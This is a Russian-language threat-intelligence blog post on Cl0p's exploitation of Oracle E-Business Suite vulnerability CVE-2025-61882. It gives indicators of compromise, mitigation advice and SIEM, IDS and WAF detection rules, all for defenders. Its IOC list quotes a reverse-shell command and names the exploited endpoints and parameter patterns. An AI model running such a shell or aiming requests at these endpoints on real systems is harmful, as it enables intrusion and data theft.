Cl0p Ransomware эксплуатирует 0-day уязвимость в Oracle E-Business Suite

Cl0p Ransomware эксплуатирует 0-day уязвимость в Oracle E-Business Suite

Дата публикации: 23 January 2026

0. Краткий профиль группировки CL0P и обзор недавней кампании

В мае–июне 2023 года кибергруппа Clop организовала одну из самых резонансных кампаний последних лет: эксплойт уязвимости в популярном ПО для передачи файлов Progress MOVEit привёл к массовой компрометации данных у сотен организаций по всему миру. Это была не локальная утечка — это был сценарий «одна уязвимость → множество жертв»: операторская модель Clop позволила быстро выявлять ценные цели, извлекать гигабайты конфиденциальной информации и ставить перед пострадавшими двоякую дилемму — платить выкуп или рисковать публичной публикацией похищенных данных. Масштаб инцидента, его влияние на цепочки поставок и скорость распространения показали, насколько уязвимы современные централизованные сервисы и как одно скомпрометированной программное решение может стать инструментом «big game hunting». В этой статье мы подробно разберём ход кампании Clop, её последствия для корпоративной безопасности и уроки, которые должны усвоить организации, чтобы снизить риск повторения подобных событий.

CL0P — давняя криминальная группа, работающая в модели ransomware-as-a-service и специализирующаяся на масштабных операциях вымогательства: кража данных, массовые письма руководству и публичное давление через публикацию похищенного. В истории группы — крупные кампании против сервисов для обмена файлами и корпоративных платформ; типичная их тактика сочетает автоматизированное сканирование уязвимых сервисов, тихую эксфильтрацию ценных данных и последующие требования выкупа с угрозой публикации.

С конца августа — начала октября 2025 года исследователи зафиксировали активность против установок Oracle E-Business Suite, а в начале октября появились сообщения о массовых рассылках вымогательных писем руководству и о подтвержденных случаях эксплуатации критической уязвимости CVE-2025-61882. Хронология: первоначальное сканирование и обнаружение уязвимых инсталляций — эксплуатация уязвимости для получения доступа — закрепление присутствия и сбор/эксфильтрация данных — массовая рассылка доказательств похищения и вымогательство.

Модель атаки повторяет устоявшийся паттерн CL0P: автоматизированная разведка интернет-видимых сервисов, эксплуатация уязвимости (unauth RCE или аналогичный вектор) для входа в систему, распространение внутри сети и вытягивание критичных баз и отчётов, затем давление на руководство через публикации и целевые письма (double-extortion). Из-за широкой распространенности затронутого ПО и автоматизации рассылок такой подход позволяет быстро затронуть большое количество организаций и наносит значительные операционные и репутационные потери.

1. Технический разбор уязвимости CVE-2025-61882 (Oracle E-Business Suite)

1.1 Описание уязвимости (что это)

  • Идентификатор: CVE-2025-61882.
  • Компонент: Oracle Concurrent Processing (E-Business Suite) — модуль интеграции с BI Publisher (BI Publisher Integration).
  • Влияние: уязвимость позволяет удалённо выполнить произвольный код без аутентификации через HTTP (pre-auth RCE). NVD оценил базовый CVSS 3.1 как 9.8 (критическая).

Oracle в своём Security Alert описывает проблему как «удалённо эксплуатируемую без аутентификации», приводя перечень затронутых версий (включая поддерживаемые строки 12.2.3–12.2.14) и варианты временного смягчения/фикса.

1.2 Какие версии и конфигурации затронуты

  • Затронутые версии, по Oracle и NVD: Oracle E-Business Suite (EBS) версии 12.2.3 — 12.2.14 в части компонента Concurrent Processing / BI Publisher Integration. Оперативно сверяйте свой установленный релиз и примененные патчи.

1.3 Механизм эксплуатации (в общих чертах, без вредоносных деталей)

  • Уязвимость возникает в обработке входящих HTTP-запросов к компонентам интеграции BI Publisher; специально сформированный HTTP-запрос может обойти проверки и привести к выполнению кода на стороне сервера. Из-за отсутствия требования аутентификации эксплойт может быть запущен удалённо против интернет-доступных инсталляций EBS. Поскольку речь о RCE, успешная эксплуатация даёт злоумышленнику полный контроль над процессом Oracle Concurrent Processing и, в ряде случаев, возможен переход к контролю над хост-системой.

1.4 Индикаторы компрометации (IOCs) и рекомендации по обнаружению

Признаки (популярные индикаторы)

  • Необычные / неизвестные входящие HTTP-запросы к страницам/эндпоинтам Oracle EBS BI Publisher / Concurrent Processing, особенно содержащие нестандартные параметры или длинные полезные нагрузки.
  • Появление новых либо изменённых файлов в каталогах EBS, где обычно не предполагается запись со стороны веб-интерфейсов.
  • Неавторизованные процессы/слушающие порты, создание новых учетных записей или задействование привилегированных учёток для запуска процессов Oracle.
  • Исходящие соединения к неизвестным хостам/облачным хранилищам, особенно сразу после подозрительных HTTP-запросов — признак эксфильтрации.

Примеры правил обнаружения

  • В IDS/IPS / WAF — правило: логировать и блокировать нестандартные/очень длинные POST/GET-запросы к путям EBS BI Publisher (и любые с необычными заголовками).
  • В EDR/SIEM (пример для Splunk-подобной системы) — поиск последовательности: HTTP запрос → создание нового процесса от службы oracle → незапланированный исходящий сетевой трафик; агрегировать сигналы и уведомлять SOC.

IPs:

  • 200.107.207.26
  • 185.181.60.11
  • 161.97.99.49
  • 162.55.17.215
  • 104.194.11.200

SHA256:

  • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
  • aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
  • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

Email contacts:

  • support@pubstorm.com
  • support@pubstorm.net

URLs / URI fragments:

  • /OA_HTML/configurator/UiServlet
  • /OA_HTML/SyncServlet
  • /oracle/apps/xdo/oa/template/webui/TemplatePreviewPG
  • TemplateCode parameter starting with TMP or DEF

Commands:

  • sh -c /bin/bash -i >& /dev/tcp// 0>&1

1.5 Меры смягчения и защитные шаги (приоритетные)

  1. Немедленно применить официальные обновления/патчи от Oracle для CVE-2025-61882. Oracle выпустил Security Alert и рекомендации по применению обновлений. Применение патчей— первоочередная мера.
  2. Отключить/изолировать интернет-доступ к EBS, если невозможно быстро запатчить. По возможности — убрать прямой доступ к EBS из интернета, поместить за VPN/тройной зоной доступа и/или WAF. Многие CERT рекомендовали временно блокировать внешние подключения.
  3. Проверить логи на признаки эксплуатации (см. раздел IOCs выше) — веб-серверы, прокси, WAF, сетевые логи, EDR. Ищите необычную активность начиная с августа 2025 (ранние следы активности фиксировались с августа).
  4. Поменять/пересмотреть учётные данные и ключи, особенно если обнаружены признаки доступа: сбросить пароли администраторов EBS, SSH-ключи на серверах, пересмотреть интеграции и сервисные аккаунты.
  5. Подготовить план реагирования: сегментировать сеть, иметь резервные копии «вне сети», контакты IR-команды и юридического отдела. Участие компетентного IR-поставщика и уведомление регуляторов/CERT обычно обязательны при подтвержденной утечке данных.

3.6 Что делать, если вы уже получили письмо-вымогательство от «CL0P» / с утверждением о компрометации EBS

  • Не взаимодействуйте напрямую с отправителем до консультации с IR-командой. Соберите доказательства (письма, вложения, хэши файлов), зафиксируйте заголовки и метаданные.
  • Проведите полный аудит EBS и прилегающих сетей: логи, учетные записи, проводки, исходящие соединения.
  • Сообщите в национальные CERT / правоохранительные органы и привлеките профессиональную помощь по реагированию на инциденты. Многие страны и отраслевые регуляторы требуют уведомления при утечке персональных данных.

2. Практические рекомендации для администраторов и руководства (шаги «до, во время, после»)

До (предотвращение)

  • Обновляйте ПО по заранее составленному графику и мониторьте выпуски экстренных патчей от поставщиков (Oracle Security Alerts).
  • Минимизируйте количество сервисов с публичным доступом; используйте WAF, VPN, многофакторную аутентификацию для административного доступа.
  • Регулярно тестируйте резервные копии и план восстановления; храните резервные копии оффлайн.

Во время (при подозрении/фиксации)

  • Изолируйте зараженные хосты, сохраните логи и снимки памяти (forensics), свяжитесь с IR-командой и регуляторами.
  • Сохраните все журналы (логи) с SIEM, сетевых устройств, серверов и почты.

После атаки — восстановление и анализ

  • Очистите или замените зараженные системы.
  • Восстановите данные только из проверенных резервных копий.
  • Определите, как именно злоумышленники проникли (фишинг, RDP, уязвимость, USB, социальная инженерия).
  • Проанализируйте логи событий, сетевой трафик, подозрительные процессы.
  • Устраните корневую причину: исправьте уязвимости, усиливайте контроль доступа, обновляйте антивирусные сигнатуры.

3. Краткая сводка и приоритеты действий (что делать прямо сейчас — для руководства ИТ/безопасности)

  1. Проверить, используете ли вы Oracle E-Business Suite версий 12.2.3–12.2.14 — если да, немедленно применить официальные патчи Oracle для CVE-2025-61882.
  2. Если немедленно пропатчить невозможно — закрыть интернет-доступ к EBS (изолировать, устранить прямой доступ) и включить WAF/контроли доступа.
  3. Запустить проверку на индикаторы компрометации (логи веб-серверов / прокси / EDR), особенно для активности с августа 2025 по настоящее время.
  4. Подготовить IR-процесс: сохранить логи, снять образы, уведомить соответствующие ведомства и, при необходимости, привлечь внешнюю forensic/IR-команду.

Конкретные правила обнаружения и примеры реализаций

A. Splunk (SPL) — поиск подозрительных запросов к EBS UI/Sync/TemplatePreview

Цель: найти HTTP-запросы к UiServlet/SyncServlet или TemplatePreview с подозрительными параметрами TemplateCode=TMP*/DEF*.

SPL:

1
2
3
4
5
6
7
8

index=web_proxy OR index=web_access sourcetype=access_combined
("/OA_HTML/configurator/UiServlet" OR "/OA_HTML/SyncServlet" OR "TemplatePreviewPG" OR "/oracle/apps/xdo/oa/template/webui")
| rex field=_raw "(TemplateCode=(?<template_code>[^&\s]+))"
| eval template_code=coalesce(template_code,"")
| where (match(_raw, "/OA_HTML/configurator/UiServlet") OR match(_raw, "/OA_HTML/SyncServlet") OR match(_raw,"TemplatePreviewPG"))
    AND (match(template_code, "^TMP") OR match(template_code,"^DEF") OR len(_raw) > 2000)
| stats count by clientip, dest_ip, http_method, uri, template_code, useragent
| sort -count

Пояснение: длинные запросы (>2000 символов) и TemplateCode начинающиеся с TMP/DEF — сильно подозрительны.

B. Elastic / Kibana — KQL пример

Цель: связать путь TemplatePreview и подозрительные параметры.

KQL (простой):

1
2
3

(http.request.method : "POST" or http.request.method : "GET")
AND http.request.uri.path : "/OA_HTML/*"
AND (http.request.uri.query : "*TemplateCode=TMP*" OR http.request.uri.query : "*TemplateCode=DEF*" OR http.request.uri.path : "*TemplatePreviewPG*")

Можно расширить условие длиной http.request.body.content_length > 2000.

C. Microsoft Sentinel / Azure Kusto (KQL) — HTTP + outbound connections

Цель: correlation rule: подозрительный входной HTTP → затем исходящее соединение (tcp) или запуск процесса java.

KQL (пример для AzureDiagnostics и Syslog/Network):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

let webHits = CommonSecurityLog
| where DeviceVendor == "Oracle" or RequestUri_s contains "/OA_HTML/"
| where RequestUri_s contains "TemplatePreviewPG" or RequestUri_s contains "UiServlet" or RequestUri_s contains "SyncServlet"
| project TimeGenerated, src_ip=SourceIP_s, dest_ip=DestinationIP_s, RequestUri_s, RequestMethod_s;

let outConns = CommonSecurityLog
| where DestinationPort_s in ("443","8443") or DestinationIp_s in ("200.107.207.26","185.181.60.11","161.97.99.49","162.55.17.215","104.194.11.200")
| project TimeGenerated, src_ip=SourceIP_s, dest_ip=DestinationIp_s, DestinationPort_s, DestinationIP_s;

webHits
| join kind=inner outConns on $left.src_ip == $right.src_ip
| where outConns.TimeGenerated between (webHits.TimeGenerated .. webHits.TimeGenerated + 1h)
| project webHits.TimeGenerated, src_ip, RequestUri_s, dest_ip, DestinationIP_s, outConns.DestinationPort_s

Цель: выявить короткую цепочку «внешний HTTP-hit на EBS» → «внезапная исходящая связь» (эксфильтрация / C2).

D. Sigma (универсальный формат) — детекция UiServlet/SyncServlet/TemplatePreview

Sigma (пример, адаптируйте под вашу платформу):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

title: Oracle EBS TemplatePreview / UiServlet Exploit Attempt
id: f2d3b8a2-xxxx-xxxx-xxxx-xxxxxxxxxxxx
status: experimental
description: Detect suspicious HTTP requests to Oracle EBS template preview and UiServlet/SyncServlet endpoints with TemplateCode TMP/DEF or large payloads.
author: your-team
logsource:
  product: webserver
  service: apache/nginx/iis
detection:
  selection:
    - url|contains:
        - "/OA_HTML/configurator/UiServlet"
        - "/OA_HTML/SyncServlet"
        - "TemplatePreviewPG"
  condition: selection and (url|contains_any("TemplateCode=TMP","TemplateCode=DEF") or request_body_length:>2000)
level: high
tags:

- attack.initial-access
- attack.exploit

Используйте в SIEM для распаковки на конкретные движки.

E. Suricata / Snort — пример HTTP-pattern rule (IDS)

Suricata (HTTP inspect) — пример:

1
2
3
4
5

alert http any any -> any any (msg:"ORACLE EBS TemplatePreview/XSL possible exploit - TemplateCode TMP/DEF"; \
flow:established,to_server; \
uricontent:"/OA_HTML/"; http_uri; \
pcre:"/TemplateCode=(?:TMP|DEF)[^&\s]{1,}/i"; \
classtype:attempted-admin; sid:1000001; rev:1;)

Примечание: производительность — тестировать в lab. Правило ловит попытки с TemplateCode TMP/DEF в URI.

F. ModSecurity (WAF) — базовый блокирующий rule

ModSecurity (OWASP CRS style) — пример (блокировать запросы к TemplatePreview с TemplateCode TMP/DEF):

1
2

SecRule REQUEST_URI "@contains /oracle/apps/xdo/oa/template/webui/TemplatePreviewPG" "id:10001,phase:2,deny,log,msg:'Block Oracle EBS TemplatePreview attempts',severity:2"
SecRule ARGS_NAMES|ARGS "@rx TemplateCode=(?:TMP|DEF)" "id:10002,phase:2,deny,log,msg:'Block TemplateCode TMP/DEF attempts',severity:2"

Рекомендуется включать сначала в мониторинг (log) режим.

Если вам интересно почитать ещё классный контент, то приглашаю в свой Telegram канал @poxek